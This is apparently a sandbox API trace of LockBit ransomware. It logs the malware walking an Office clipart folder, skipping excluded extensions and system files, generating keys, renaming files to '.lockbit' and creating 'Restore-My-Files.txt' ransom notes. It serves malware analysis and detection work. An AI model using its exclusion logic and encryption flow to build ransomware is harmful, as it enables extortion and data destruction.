[0180.384] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.384] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.384] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.384] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01297_.GIF.lockbit") returned 72 [0180.384] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01297_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01297_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.386] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.386] malloc (_Size=0x40068) returned 0x3df0008 [0180.386] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=894) returned 1 [0180.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.387] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.400] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01297_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01297_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.400] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.400] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.402] free (_Block=0x1fa2ed8) [0180.402] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01297_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.402] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.402] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.402] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d921100, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d921100, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x2bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01298_.GIF", cAlternateFileName="")) returned 1 [0180.402] lstrcmpiW (lpString1=".", lpString2="WB01298_.GIF") returned -1 [0180.402] lstrcmpiW (lpString1="..", lpString2="WB01298_.GIF") returned -1 [0180.402] PathFindExtensionW (pszPath="WB01298_.GIF") returned=".GIF" [0180.402] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.402] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.402] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.403] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.403] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.404] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01298_.GIF") returned -1 [0180.404] lstrcmpiW (lpString1="ntldr", lpString2="WB01298_.GIF") returned -1 [0180.404] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01298_.GIF") returned -1 [0180.404] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01298_.GIF") returned -1 [0180.404] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01298_.GIF") returned -1 [0180.404] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01298_.GIF") returned -1 [0180.404] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01298_.GIF") returned -1 [0180.404] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.404] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01298_.GIF") returned=".GIF" [0180.404] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.404] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.405] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.405] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.405] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01298_.GIF.lockbit") returned 72 [0180.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01298_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01298_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0180.411] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.411] malloc (_Size=0x40068) returned 0x1ff1e60 [0180.411] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=700) returned 1 [0180.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0180.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0180.412] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.413] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01298_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01298_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.413] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.413] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.417] free (_Block=0x1fa2ed8) [0180.417] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01298_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.417] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.417] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.417] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d77c00, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82d77c00, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01299_.GIF", cAlternateFileName="")) returned 1 [0180.417] lstrcmpiW (lpString1=".", lpString2="WB01299_.GIF") returned -1 [0180.417] lstrcmpiW (lpString1="..", lpString2="WB01299_.GIF") returned -1 [0180.417] PathFindExtensionW (pszPath="WB01299_.GIF") returned=".GIF" [0180.417] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.417] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.417] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.417] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.417] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.417] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.417] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.417] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.418] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.418] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.418] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.418] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.418] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.418] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.418] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.418] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.418] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.419] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01299_.GIF") returned -1 [0180.419] lstrcmpiW (lpString1="ntldr", lpString2="WB01299_.GIF") returned -1 [0180.419] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01299_.GIF") returned -1 [0180.419] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01299_.GIF") returned -1 [0180.419] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01299_.GIF") returned -1 [0180.419] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01299_.GIF") returned -1 [0180.419] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01299_.GIF") returned -1 [0180.419] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.419] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01299_.GIF") returned=".GIF" [0180.419] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.419] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.419] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.419] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.419] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.420] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.420] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.420] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01299_.GIF.lockbit") returned 72 [0180.420] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01299_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01299_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0180.421] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.422] malloc (_Size=0x40068) returned 0x3d70450 [0180.422] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=318) returned 1 [0180.422] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.422] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0180.422] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.422] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0180.423] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0180.423] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01299_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01299_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.423] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.423] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.425] free (_Block=0x1fa2ed8) [0180.425] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01299_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.425] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.425] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.425] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794e1400, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x794e1400, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x250, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01300_.GIF", cAlternateFileName="")) returned 1 [0180.425] lstrcmpiW (lpString1=".", lpString2="WB01300_.GIF") returned -1 [0180.425] lstrcmpiW (lpString1="..", lpString2="WB01300_.GIF") returned -1 [0180.425] PathFindExtensionW (pszPath="WB01300_.GIF") returned=".GIF" [0180.425] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.425] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.425] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.425] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.425] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.425] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.425] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.425] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.425] lstrcmpiW (lpString1=".com", 